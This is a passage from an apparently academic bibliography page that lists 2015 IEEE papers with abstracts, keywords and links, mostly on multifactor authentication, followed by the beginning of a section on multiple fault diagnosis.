Keywords: Internet; multiprocessing systems; program compilers; programming environments; software libraries; specification languages; ubiquitous computing; Web server application; code generation; contextual program execution environments; global context-awareness; language settings; multicore processors; sensor states; smart devices; software library; specification language; thread-local context-awareness; ubiquitous computing; user sessions; Accuracy; Context; Hardware; Instruction sets; Security; Synchronization; Web servers; context oriented programming; customization; multi-core; persistency; ubiquitous computing (ID#: 16-9408)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160121&isnumber=7160107


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Multifactor Authentication 2015

 

 
SoS Logo

Multifactor Authentication 2015

 

Multifactor authentication is of general interest within cryptography.  For the Science of Security community, it relates to human factors, resilience, and metrics.  The work cited here was presented in 2015.


Pavlovski, C.; Warwar, C.; Paskin, B.; Chan, G., "Unified Framework for Multifactor Authentication," In Telecommunications (ICT), 2015 22nd International Conference on, pp. 209-213, 27-29 April 2015. doi: 10.1109/ICT.2015.7124684

Abstract: The progression towards the use of mobile network devices in all facets of personal, business and leisure activity has created new threats to users and challenges to the industry to preserve security and privacy. Whilst mobility provides a means for interacting with others and accessing content in an easy and malleable way, these devices are increasingly being targeted by malicious parties in a variety of attacks. In addition, web technologies and applications are supplying more function and capability that attracts users to social media sites, e-shopping malls, and for managing finances (banking). The primary mechanism for authentication still employs a username and password based approach. This is often extended with additional (multifactor) authentication tools such as one time identifiers, hardware tokens, and biometrics. In this paper we discuss the threats, risks and challenges with user authentication and present the techniques to counter these problems with several patterns and approaches. We then outline a framework for supplying these authentication capabilities to the industry based on a unified authentication hub.

Keywords: Internet; authorisation; mobile computing; Web applications; Web technologies; authentication capabilities; e-shopping malls; finance management; mobile network devices; multifactor authentication tool; password based approach; social media sites; unified authentication hub; user authentication; username based approach; Authentication; Banking; Biometrics (access control); Business; Mobile communication; Mobile handsets; mobile networks; multifactor authentication; security; unified threat management (ID#: 16-9159)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7124684&isnumber=7124639

 

Adukkathayar, A.; Krishnan, G.S.; Chinchole, R., "Secure Multifactor Authentication Payment System Using NFC," in Computer Science & Education (ICCSE), 2015 10th International Conference on, pp. 349-354, 22-24 July 2015. doi: 10.1109/ICCSE.2015.7250269

Abstract: The latest trend of making financial transactions is done by the use of cards or internet banking. A person may have multiple bank accounts across several banks which makes it difficult for him/her to manage the transactions i.e. he/she either has to carry several cards or use a bunch of bank websites for accomplishing his/her transaction purposes. This situation demands the need of a simple, secure and hi-tech system for achieving the purposes of making transactions. We propose such a system that uses the latest technologies like NFC and multifactor authentication which can be used on any NFC enabled Smartphone. The multi factor authentication system uses a 4-digit PIN as the knowledge factor, an NFC enabled Smartphone, instead of cards, as the possession factor and the face of the user as the inherence factor for the purpose of authentication. The proposed system which can be implemented as cross-platform mobile application, not only allows the user to make secure transactions, but also allows him/her to make transactions from his/her multiple accounts.

Keywords: bank data processing; message authentication; mobile computing; near-field communication; smart phones;4-digit PIN;NFC enabled smartphone; bank accounts; cross-platform mobile application; financial transactions; inherence factor; knowledge factor; near field communication; online bank transactions; possession factor; secure multifactor authentication payment system; secure transactions; Authentication; Face; Face recognition; Mobile communication; Online banking; Receivers; Authentication; Consumer Storage; Mobile computing; Multifactor; NFC; Near Field Communication; Peer-to-peer; Security (ID#: 16-9160)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7250269&isnumber=7250193

 

Mandyam, G.D.; Milikich, M., "Leveraging Contextual Data for Multifactor Authentication in the Mobile Web," in Communication Systems and Networks (COMSNETS), 2015 7th International Conference on, pp. 1-4, 6-10 Jan. 2015. doi: 10.1109/COMSNETS.2015.7098728

Abstract: Identiyy and authentication in the mobile web are important for many types of applications that benefit users, including payments. The mobile web today has several traditional approaches to authentication that allow for sensitive applications to take place. However, moving forward the use of contextual data can have a place in the area of authentication, Use of sensor information available on smartphones can provide information about user context that can serve either to augment existing authentication techniques or even provide additional authentication factors in their own right.

Keywords: Internet; authorisation; mobile computing; smart phones; authentication factors; contextual data; mobile Web authentication; multifactor authentication; sensitive applications; sensor information; smartphones; Browsers; Conferences; Geology; authentication; authorization (ID#: 16-9161)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7098728&isnumber=7098633

 

Dharavath, K.; Talukdar, F.A.; Laskar, R.H., "Facial Image Processing in Conjunction with Password for Intelligent Access Control," in TENCON 2015 - 2015 IEEE Region 10 Conference, pp. 1-5, 1-4 Nov. 2015. doi: 10.1109/TENCON.2015.7373181

Abstract: In most of the access control systems employed in any organizations, one or more level authentication steps are used to protect their assets. These authentication systems in general involve one or more level knowledge based or possession based authentication steps or sometimes the combination of both, in order to have a high security. However, with the advance of technology these methods are more vulnerable to soft attacks, i.e. more prone to tampering problems. Hence there is a need to have an authentication factor which is highly impossible to synthesize it in any manner. We present a frame work of secured intelligent access control system using two authentication factors namely, inherence factor and knowledge factor. Facial image and a personalized unique password are used as inherence and knowledge factors respectively. Gabor filter along with a subspace technique is employed for feature extraction and matching test and training images. Proposed two factor authentication system reported far better results than any other access control systems existing in literature.

Keywords: Gabor filters; face recognition; feature extraction; image filtering; image matching; Gabor filter; authentication systems; facial image processing; feature extraction; inherence factor; intelligent access control system; knowledge factor; matching test; personalized password; possession-based authentication step; soft attacks; subspace technique; tampering problem; training images; Access control; Authentication; Face; Face recognition; Feature extraction; Gabor filters; Principal component analysis; Face recognition; Gabor features local binary pattern; multifactor authentication; principal component analysis; statistical features; texture features (ID#: 16-9162)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7373181&isnumber=7372693

 

Albahbooh, N.A.; Bours, P., "A Mobile Phone Device as a Biometrics Authentication Method for an ATM Terminal," in Computer and Information Technology; Ubiquitous Computing and Communications; Dependable, Autonomic and Secure Computing; Pervasive Intelligence and Computing (CIT/IUCC/DASC/PICOM), 2015 IEEE International Conference on, pp. 2017-2024, 26-28 Oct. 2015. doi: 10.1109/CIT/IUCC/DASC/PICOM.2015.299

Abstract: The use of mobile phone devices is expanding rapidly and they become essential tools that offer competitive business advantages in today's growing world of global computing environments. A Mobile phone device is a suitable tool for a multifactor authentication that could provide powerful and easy to use authentication device to access any service securely such as an ATM terminal as well as would increase the level of protection for critical and sensitive information. In this paper, we present a protocol that provides more secure ATM authentication using biometrics (fingerprint or face) on a mobile phone device under the restriction that no changes can be made to the existing physical infrastructure. Furthermore, we give an overview of the current ATM authentication methods utilizing mobile devices as a factor in the authentication process. Moreover, we outline a high level security analysis for the proposed authentication protocol.

Keywords: banking; biometrics (access control); cryptographic protocols; mobile computing; mobile handsets; ATM authentication methods; ATM terminal; authentication protocol; biometrics authentication method; global computing environments; high level security analysis; mobile phone device; multifactor authentication; Authentication; Biometrics (access control); Mobile handsets; Online banking; Protocols; ATM Terminal; Authentication Protocol; Biometrics; Fuzzy Vault; Mobile Phone Device  (ID#: 16-9163)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7363345&isnumber=7362962

 

Dostalek, L.; Ledvina, J., "Strong Authentication for Internet Mobile Application," in Applied Electronics (AE), 2015 International Conference on, pp. 23-26, 8-9 Sept. 2015. Doi: (not provided)

Abstract: 4G networks to utilize Voice over LTE (VoLTE). VoLTE uses similar authentication mechanisms such as HTTP. It is therefore possible that a web client on the mobile device will use for authentication mechanism originally designed for the VoLTE [10]. I.e. to use the AKA mechanism, which uses the UICC (USIM / ISIM). This mechanism authenticates the user to the mobile network. However, Web applications can provide another entity. This contribution to discuss the possibility of strong authentication into applications running on mobile devices. It deals with the possibility of combining algorithm AKA with other authentication algorithms. Combination of two algorithms will be created strong multifactor authentication, which is suitable for applications demanding high secure authentication such as Internet banking or Internet access to the Government applications.

Keywords: 4G mobile communication; Internet; Long Term Evolution; mobile computing; security of data; 4G networks; AKA mechanism; HTTP; ISIM; Internet mobile application; UICC; USIM; VoLTE; mobile network; secure authentication; strong multifactor authentication; voice over LTE; Authentication; Mobile communication; Mobile computing; Mobile handsets; Resistance; Smart cards; Authentication; Mobile Application; Security; Smart Card; Strong Password Authentication (ID#: 16-9164)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7301048&isnumber=7301036

 

Johnston, A.H.; Weiss, G.M., "Smartwatch-Based Biometric Gait Recognition," in Biometrics Theory, Applications and Systems (BTAS), 2015 IEEE 7th International Conference on, pp. 1-6, 8-11 Sept. 2015. doi: 10.1109/BTAS.2015.7358794

Abstract: The advent of commercial smartwatches provides an intriguing new platform for mobile biometrics. Like their smartphone counterparts, these mobile devices can perform gait-based biometric identification because they too contain an accelerometer and a gyroscope. However, smartwatches have several advantages over smartphones for biometric identification because users almost always wear their watch in the same location and orientation. This location (i.e. the wrist) tends to provide more information about a user's movements than the most common location for smartphones (pockets or handbags). In this paper we show the feasibility of using smartwatches for gait-based biometrics by demonstrating the high levels of accuracy that can result from smartwatch-based identification and authentication models. Applications of smartwatch-based biometrics range from a new authentication challenge for use in a multifactor authentication system to automatic personalization by identifying the user of a shared device.

Keywords: biometrics (access control); gait analysis; identification; image recognition; message authentication; mobile computing; biometric gait recognition; multifactor authentication system; smartwatch-based biometrics; smartwatch-based identification; Accelerometers; Authentication; Biosensors; Gait recognition; Gyroscopes; Performance evaluation (ID#: 16-9165)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7358794&isnumber=7358743

 

Shah, Y.; Choyi, V.; Subramanian, L., "Multi-factor Authentication as a Service," in Mobile Cloud Computing, Services, and Engineering (MobileCloud), 2015 3rd IEEE International Conference on, pp. 144-150, March 30 2015-April 3 2015. doi: 10.1109/MobileCloud.2015.35

Abstract: An architecture for providing multi-factor authentication as a service is proposed, resting on the principle of a loose coupling and separation of duties between network entities and end user devices. The multi-factor authentication architecture leverages Identity Federation and Single-Sign-On technologies, such as the OpenID framework, in order to provide for a modular integration of various factors of authentication. The architecture is robust and scalable enabling service providers to define risk-based authentication policies by way of assurance level requirements, which map to concrete authentication factor capabilities on user devices.

Keywords: cloud computing; message authentication; OpenID framework; assurance level requirements; authentication factor capabilities; identity federation; multifactor authentication architecture; multifactor authentication as a service; risk-based authentication policies; single-sign-on technologies; user devices; Authentication; Biometrics (access control); Mobile communication; Mobile computing; Protocols; Servers; OpenID; assurance level; biometrics; federated identity; multi-factor authentication; single-sign-on (ID#: 16-9166)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7130879&isnumber=7130853

 

Thiranant, N.; Young Sil Lee; HoonJae Lee, "Performance Comparison Between RSA and Elliptic Curve Cryptography-Based QR Code Authentication," in Advanced Information Networking and Applications Workshops (WAINA), 2015 IEEE 29th International Conference on, pp. 278-282, 24-27 March 2015. doi: 10.1109/WAINA.2015.62

Abstract: In the QR Code authentication technique, smart phone has become a great tool and played an important role in the authentication process. It has been used in various fields over the internet, especially in multi-factor authentication. However, security aspects should be well taken care of. In this paper, the performance comparison between RSA and Elliptic Curve Cryptography-based QR Code Authentication is proposed. It mainly focuses on QR Code, as it is now widely used all over the world. In addition, existing and related work has leveraged the use of RSA, but no work done on Elliptic Curve Cryptography. The experiment results and comparisons are shown and described in this paper.

Keywords: codes; public key cryptography; smart phones; QR code authentication technique; RSA; elliptic curve cryptography-based QR code authentication; internet; multifactor authentication; smartphone; Authentication; Elliptic curve cryptography; Elliptic curves; Encryption; Data encryption; Elliptic Curve Cryptography; Mobile application; Public-key algorithm; QR Code (ID#: 16-9167)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7096187&isnumber=7096097

 

Guifen Zhao; Ying Li; Liping Du; Xin Zhao, "Asynchronous Challenge-Response Authentication Solution Based on Smart Card in Cloud Environment," in Information Science and Control Engineering (ICISCE), 2015 2nd International Conference on, pp. 156-159, 24-26 April 2015. doi: 10.1109/ICISCE.2015.42

Abstract: In order to achieve secure authentication, an asynchronous challenge-response authentication solution is proposed. SD key, encryption cards or encryption machine provide encryption service. Hash function, symmetric algorithm and combined secret key method are adopted while authenticating. The authentication security is guaranteed due to the properties of hash function, combined secret key method and one-time authentication token generation method. Generate random numbers, one-time combined secret key and one-time token on the basis of smart card, encryption cards and cryptographic technique, which can avoid guessing attack. Moreover, the replay attack is avoided because of the time factor. The authentication solution is applicable for cloud application systems to realize multi-factor authentication and enhance the security of authentication.

Keywords: cloud computing; message authentication; private key cryptography; smart cards; SD key; asynchronous challenge-response authentication solution; authentication security; cloud application systems; combined secret key method; cryptographic technique; encryption cards; encryption machine; encryption service; hash function; multifactor authentication; one-time authentication token generation method; one-time combined secret key; random number generation; replay attack; smart card; symmetric algorithm; time factor; Authentication; Encryption; Servers; Smart cards; Time factors; One-time password; asynchronous challenge-response authentication; multi-factor authentication; smart card}, (ID#: 16-9168)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7120582&isnumber=7120439

 

Amin, R.; Biswas, G.P., "Anonymity Preserving Secure Hash Function Based Authentication Scheme for Consumer USB Mass Storage Device," in Computer, Communication, Control and Information Technology (C3IT), 2015 Third International Conference on, pp. 1-6, 7-8 Feb. 2015. doi: 10.1109/C3IT.2015.7060190

Abstract: A USB (Universal Serial Bus) mass storage device, which makes a (USB) device accessible to a host computing device and enables file transfers after completing mutual authentication between the authentication server and the user. It is also very popular device because of it's portability, large storage capacity and high transmission speed. To protect the privacy of a file transferred to a storage device, several security protocols have been proposed but none of them is completely free from security weaknesses. Recently He et al. proposed a multi-factor based security protocol which is efficient but the protocol is not applicable for practical implementation, as they does not provide password change procedure which is an essential phase in any password based user authentication and key agreement protocol. As the computation and implementation of the cryptographic one-way hash function is more trouble-free than other existing cryptographic algorithms, we proposed a light weight and anonymity preserving three factor user authentication and key agreement protocol for consumer mass storage devices and analyzes our proposed protocol using BAN logic. Furthermore, we have presented informal security analysis of the proposed protocol and confirmed that the protocol is completely free from security weaknesses and applicable for practical implementation.

Keywords: cryptographic protocols; file organisation; BAN logic; USB device; anonymity preserving secure hash function based authentication scheme ;anonymity preserving three factor user authentication; authentication server; consumer USB mass storage device; consumer mass storage devices; cryptographic algorithms; cryptographic one-way hash function; file transfers; host computing device; informal security analysis; key agreement protocol; multifactor based security protocols; password based user authentication; password change procedure; storage capacity; universal serial bus mass storage device; Authentication; Cryptography; Protocols; Servers; Smart cards; Universal Serial Bus; Anonymity; Attack; File Secrecy; USB MSD; authentication (ID#: 16-9169)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7060190&isnumber=7060104

 

Longji Tang; Liubo Ouyang; Wei-Tek Tsai, "Multi-factor Web API Security for Securing Mobile Cloud," in Fuzzy Systems and Knowledge Discovery (FSKD), 2015 12th International Conference on, pp. 2163-2168, 15-17 Aug. 2015. doi: 10.1109/FSKD.2015.7382287

Abstract: Mobile Cloud Computing is gaining more popularity in both mobile users and enterprises. With mobile-first becoming enterprise IT strategy and more enterprises exposing their business services to mobile cloud through Web API, the security of mobile cloud computing becomes a main concern and key successful factor as well. This paper shows the security challenges of mobile cloud computing and defines an end-to-end secure mobile cloud computing reference architecture. Then it shows Web API security is a key to the end-to-end security stack and specifies traditional API security mechanism and two multi-factor Web API security strategy and mechanism. Finally, it compares the security features provided by ten API gateway providers.

Keywords: application program interfaces; cloud computing; mobile computing; security of data; API gateway providers; API security mechanism; business services; end-to-end secure mobile cloud computing; enterprise IT strategy; mobile cloud computing; mobile users; multifactor Web API security; securing mobile cloud; Authentication; Authorization; Business; Cloud computing; Mobile communication; end-to-end; mobile cloud; security mechanism; web API (ID#: 16-9170)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7382287&isnumber=7381900

 

van der Haar, D., "CaNViS: A Cardiac and Neurological-Based Verification System that uses Wearable Sensors," in Digital Information, Networking, and Wireless Communications (DINWC), 2015 Third International Conference on , pp. 99-104, 3-5 Feb. 2015. doi: 10.1109/DINWC.2015.7054225

Abstract: The prevalence of more portable physiological sensors in medical, lifestyle and security fields have ushered in more viable iometric attributes that can be used for the task of identification and authentication. The portability of these sensors also allows systems that require more than one signal source to be feasible and more practical. Once these biological signals are captured, they can then be combined for the purposes of authentication. The study proposes such a multi-factor biometric system, by fusing cardiac and neurological components captured with an electrocardiograph (ECG) and electroencephalograph (EEG) respectively and using them as a biometric attribute. Representing each of these components in a common format and fusing them at a feature level allows one to create a novel biometric system that is interoperable with different biological signal sources. The results indicate the system portrays a sufficient false rejection (FRR) and false acceptance rates (FAR). The results also show there is value in implementing multi-factor biological signal-based biometric systems using wearable sensors.

Keywords: biometrics (access control); electrocardiography; electroencephalography; medical signal processing; CaNViS; ECG; EEG; biological signal source; cardiac and neurological-based verification system; cardiac component; electrocardiograph; electroencephalograph; false acceptance rate; false rejection ratae; multifactor biological signal; multifactor biometric system; neurological component; wearable sensors; Authentication; Biometrics (access control);Biosensors; Electrocardiography; Electroencephalography; Feature extraction; Authentication; Biometric Fusion; Biometrics; Wearable Computing (ID#: 16-9171)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7054225&isnumber=7054206

 

Haider, S.K.; Ahmad, M.; Hijaz, F.; Patni, A.; Johnson, E.; Seita, M.; Khan, O.; van Dijk, M., "M-MAP: Multi-factor Memory Authentication for Secure Embedded Processors," in Computer Design (ICCD), 2015 33rd IEEE International Conference on, pp. 471-474, 18-21 Oct. 2015. doi: 10.1109/ICCD.2015.7357151

Abstract: The challenges faced in securing embedded computing systems against multifaceted memory safety vulnerabilities have prompted great interest in the development of memory safety countermeasures. These countermeasures either provide protection only against their corresponding type of vulnerabilities, or incur substantial architectural modifications and overheads in order to provide complete safety, which makes them infeasible for embedded systems. In this paper, we propose M-MAP: a comprehensive system based on multi-factor memory authentication for complete memory safety. We examine certain crucial implications of composing memory integrity verification and bounds checking schemes in a comprehensive system. Based on these implications, we implement M-MAP with hardware based memory integrity verification and software based bounds checking to achieve a balance between hardware modifications and performance. We demonstrate that M-MAP implemented on top of a lightweight out-of-order processor delivers complete memory safety with only 32% performance overhead on average, while incurring minimal hardware modifications, and area overhead.

Keywords: embedded systems; security of data; storage management chips; M-MAP; embedded computing systems; hardware modifications; memory safety countermeasures; multifaceted memory safety vulnerabilities; multifactor memory authentication; secure embedded processors; Benchmark testing; Computer architecture; Hardware; Program processors; Random access memory; Safety (ID#: 16-9172)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7357151&isnumber=7357071

 

Gepko, I., "General Requirements and Security Architecture for Mobile Phone Anti-Cloning Measures," in EUROCON 2015 - International Conference on Computer as a Tool (EUROCON), IEEE, pp. 1-6, 8-11 Sept. 2015. doi: 10.1109/EUROCON.2015.7313666

Abstract: The impressive number of counterfeit and stolen mobile phones as well as the emergence of applications where the authentication of mobile terminal is needed shows the critical importance of reliable protection of the mobile device identity. Counterfeiters may use for their products identifiers allocated for genuine handsets. Besides, forgery of the International Mobile Equipment Identity (IMEI) is not too difficult for most of existing smartphones as their software which is the last source of IMEI before sending it to network is vulnerable to modifications. In this paper we argue that there is a need for developing of anti-cloning tool for the mobile devices, which efficacy should not depend on manufacturers. The basic requirements for the novel security architecture were formulated. We introduced “provable experience” authentication factor of mobile device which is dual with respect to the “social network” authentication factor of user. A novel method of multi-factor authentication of mobile device is proposed based on this, which allows effective blocking of clones in cellular networks and does not require standardization or changes in mobile device construction.

Keywords: security of data; smart phones; social networking (online); IMEI; anticloning tool; cellular networks; counterfeit mobile phones; genuine handsets; international mobile equipment identity; mobile device identity; mobile phone anticloning measures; mobile terminal authentication; multifactor mobile device authentication; provable experience authentication factor; security architecture; smartphones; social network authentication factor; Authentication; Mobile communication; Mobile computing; Mobile handsets; Software; IMEI; authentication factor; identity; mobile device; multi-factor authentication; security (ID#: 16-9173)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7313666&isnumber=7313653

 

Lupu, C.; Gaitan, V.-G.; Lupu, V., "Fingerprints Used for Security Enhancement of Online Banking Authentication Process," in Electronics, Computers and Artificial Intelligence (ECAI), 2015 7th International Conference on, pp. 217-220, 25-27 June 2015. doi: 10.1109/ECAI.2015.7301177

Abstract: Online banking services have become one of the most important applications on the Internet, being provided by most of the banks all over the world. The end-user can manage the accounts or make some payments without being forced to go to the physical bank office. That's why security concerns regarding authentication have to be taken into the account and the bank should provide various and combined methods for login, in order to increase the confidence in their services. In other words, the bank should provide a multi-factor authentication. This paper will present a model for user enrollment and authentication, using three basic methods, based on: what user knows (a username), what user has (a digipass) and an intrinsic characteristic of the user, e.g. a fingerprint. Combining these three characteristics will lead to a great security improvement in authentication or order signing. Classical methods are based only on the first two characteristics (what user knows and has), without the most habitual one, that cannot be lost or stolen: an intrinsic characteristic of the user, like a fingerprint or an iris. This paper will also present an application developed during our researches, for user enrollment that can be used in the bank-side environment.

Keywords: Internet; bank data processing; message authentication; retail data processing; Internet; digipass; end-user; fingerprints; intrinsic characteristic; multifactor authentication; online banking services; order signing; security enhancement; security improvement; user authentication; user enrollment; username; Authentication; Fingerprint recognition; Iris recognition; Online banking; biometrics; enrollment; online banking; process flowchart; security (ID#: 16-9174)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7301177&isnumber=7301133

 

Fathi, R.; Salehi, M.A.; Leiss, E.L., "User-Friendly and Secure Architecture (UFSA) for Authentication of Cloud Services," in Cloud Computing (CLOUD), 2015 IEEE 8th International Conference on, pp. 516-523, June 27 2015-July 2 2015. doi: 10.1109/CLOUD.2015.75

Abstract: Clouds are becoming prevalent service providers because of their low upfront costs, rapid application deployment, and high scalability. Many users outsource their sensitive data and services to cloud providers. Users frequently access these sensitive services through devices and connections that are vulnerable to thieving and eavesdropping. Therefore, users are desperate of robust security measures to protect their data and services privacy in clouds. In particular, robust authentication techniques are demanded by users for safe access to cloud services. One technique is to utilize multiple authentication factors (a.k. A multi-factor authentication) to access cloud services. However, the challenge is that the multi-factor authentication technique is not effective as it causes user frustration and fatigue. To address this challenge, in this study, we propose a multi-factor authentication architecture that aims at minimizing the perceived authentication hardship for cloud users while improving the security of the authentication. To achieve the goal, our authentication architecture suggests a progressive manner to leverage access to different levels of cloud services. At each level, the architecture asks for authentication factors by considering the perceived hardship for users. To increase the security and user convenience, the architecture also considers implicit authentication factors in addition to the explicit factors. Our evaluation results indicate that authentication using the proposed architecture decreases the users' perceived hardship up to 29% in compare with other methods. The results also reveal that our proposed architecture adapts the authentication difficulty based on the user condition.

Keywords: cloud computing; data protection; message authentication; software architecture; UFSA; cloud providers; cloud service authentication; cloud service privacy; data privacy; data protection; explicit authentication factors; implicit authentication factors; multifactor authentication technique; multiple authentication factors; robust authentication techniques; robust security measures; user-friendly and secure architecture; Authentication; Computer architecture; Engines; Mathematical model; Mobile handsets; Sensitivity; Cloud services; Multi-factor Authentication; Sand-boxing; User-friendly authentication (ID#: 16-9175)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7214085&isnumber=7212169

 

Khan, S.H.; Akbar, M.A., "Multi-Factor Authentication on Cloud," in Digital Image Computing: Techniques and Applications (DICTA), 2015 International Conference on, pp. 1-7, 23-25 Nov. 2015

doi: 10.1109/DICTA.2015.7371288

Abstract: Due to the recent security infringement incidents of single factor authentication services, there is an inclination towards the use of multi-factor authentication (MFA) mechanisms. These MFA mechanisms should be available to use on modern hand-held computing devices like smart phones due to their big share in computational devices market. Moreover, the high social acceptability and ubiquitous nature has attracted the enterprises to offer their services on modern day hand-held devices. In this regard, the big challenge for these enterprises is to ensure security and privacy of users. To address this issue, we have implemented a verification system that combines human inherence factor (handwritten signature biometrics) with the standard knowledge factor (user specific passwords) to achieve a high level of security. The major computational load of the aforementioned task is shifted on a cloud based application server so that a platform-independent user verification service with ubiquitous access becomes possible. Custom applications are built for both the iOS and Android based devices which are linked with the cloud based two factor authentication (TFA) server. The system is tested on-the-run by a diverse group of users and 98.4% signature verification accuracy is achieved.

Keywords: cloud computing; data privacy; message authentication; ubiquitous computing; Android based device; cloud based application server; hand-held computing device; handwritten signature biometrics; human inherence factor; iOS; multifactor authentication; security infringement; signature verification; single factor authentication service; smart phone; two factor authentication server; user privacy; user security; Authentication; Biometrics (access control); Hidden Markov models; Performance evaluation; Servers; Smart phones (ID#: 16-9176)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7371288&isnumber=7371204


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


 

Multiple Fault Diagnosis 2015

 

 
SoS Logo

Multiple Fault Diagnosis 2015

 

According to Shakeri, “the computational complexity of solving the optimal multiple-fault isolation problem is super exponential.”  Most processes and procedures assume that there will be only one fault at any given time.  Many algorithms are designed to do sequential diagnostics.  With the growth of cloud computing and multicore processors and the ubiquity of sensors, the problem of multiple fault diagnosis has grown even larger.  For the Science if Security community, multiple fault diagnosis is relevant to cyber physical systems, resiliency, metrics, and human factors.  The work cited here was presented in 2015.


Zhang Ke; Chai Yi; Liu Jianhuan; Feng Xiaohui, "Analysis of Class Group Distinguishing Based Conceptual Models for Multiple Fault Diagnosis," in Control Conference (CCC), 2015 34th Chinese, pp. 6397-6402, 28-30 July 2015. doi: 10.1109/ChiCC.2015.7260647

Abstract: It is common that multiple fault exists in actual engineering and complex systems. Due to parameters in multiple faults tightly coupled, relationship between the fault mode and known mono-fault features is non-linear. Thus, it is hard to see how distinguish in mapping set for "fault to symptom". In this case, there is no guarantee that traditional diagnosis methods for mono-fault meet the demands. With the requirement, an analysis of the traits of multiple faults is made. A summarization is given to class group distinguishing (CGD) based methods that applied in fault diagnosis. Major defects in the methods that applied in multiple fault diagnosis are analyzed. On that basis, fault modes and symptoms are taken as key points. Conceptual models for multiple fault diagnosis based on CGD are gradually explored. By the models, actual faults can be mapped to one or more known mono-faults via distinguishing analysis, and therefore multiple faults can be diagnosed. There are 4 kinds of flow chart and construction for the models are established. Each of these models presents advantages and disadvantages are separately presented at the end of the chapter.

Keywords: fault diagnosis; pattern classification; pattern clustering; uncertainty handling; CGD based methods; class group distinguishing based conceptual models; fault to symptom; monofault features; multiple fault diagnosis; uncertainty reasoning; Analytical models; Automation; Cognition; Couplings; Fault diagnosis; Support vector machines; Uncertainty; Class Group Distinguishing; Classification; Cluster; Conceptual Models; Fault Diagnosis; Multiple Fault (ID#: 16-9213)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7260647&isnumber=7259602

 

Irita, T.; Namerikawa, T., "Decentralized Fault Detection of Multiple Cyber Attacks in Power Network via Kalman Filter," in Control Conference (ECC), 2015 European pp. 3180-3185, 15-17 July 2015.

doi: 10.1109/ECC.2015.7331023

Abstract: This paper discusses faults diagnosis method of multiple cyber attacks in networked electrical power systems. We deal with a power network of a centralized system, and then, some parameters are estimated by Kalman filter. Using a sensor network system, each of sensor nodes can exchange information by wireless communication. A fault diagnosis method is proposed by using both fault detection diagnosis matrix and fault distinction matrix. The former is composed of estimated values and observed values. On the other hand, the latter is composed of observed values and calculated values via the senor network. Finally, the effectiveness of the proposed approach is validated by a simulation experiment.

Keywords: Kalman filters; fault diagnosis; matrix algebra; power system faults; power system parameter estimation; power system security; wireless sensor networks; Kalman filter; decentralized fault detection diagnosis matrix; fault distinction matrix; faults diagnosis method; information exchange; multiple cyber attacks; networked electrical power systems; parameter estimation; power network; sensor network system; sensor nodes; wireless communication; Fault detection; Generators; Kalman filters; Mathematical model; Power grids; Power system dynamics; Rotors (ID#: 16-9214)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7331023&isnumber=7330515

 

Meera, G.; Geethakumari, G., "A Provenance Auditing Framework for Cloud Computing Systems," in Signal Processing, Informatics, Communication and Energy Systems (SPICES), 2015 IEEE International Conference on, pp. 1-5, 19-21 Feb. 2015. doi: 10.1109/SPICES.2015.7091427

Abstract: Cloud computing is a service oriented paradigm that aims at sharing resources among a massive number of tenants and users. This sharing facility that it provides coupled with the sheer number of users make cloud environments susceptible to major security risks. Hence, security and auditing of cloud systems is of great relevance. Provenance is a meta-data history of objects which aid in verifiability, accountability and lineage tracking. Incorporating provenance to cloud systems can help in fault detection. This paper proposes a framework which aims at performing secure provenance audit of clouds across applications and multiple guest operating systems. For integrity preservation and verification, we use established cryptographic techniques. We look at it from the cloud service providers' perspective as improving cloud security can result in better trust relations with customers.

Keywords: auditing; cloud computing; cryptography; data integrity; fault diagnosis; meta data; resource allocation; service-oriented architecture; trusted computing; accountability; cloud computing systems; cloud environments; cloud security; cloud service providers; cryptographic techniques; fault detection; integrity preservation; integrity verification; lineage tracking; metadata history; operating systems; provenance auditing framework; resource sharing; security risks; service oriented paradigm; sharing facility; trust relations; verifiability; Cloud computing; Cryptography; Digital forensics; Monitoring; Virtual machining; Auditing; Cloud computing; Provenance (ID#: 16-9215)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7091427&isnumber=7091354

 

Sousa, B.; Pentikousis, K.; Curado, M., "Multihoming Aware Optimization Mechanism," in Integrated Network Management (IM), 2015 IFIP/IEEE International Symposium on, pp. 1085-1091, 11-15 May 2015. doi: 10.1109/INM.2015.7140437

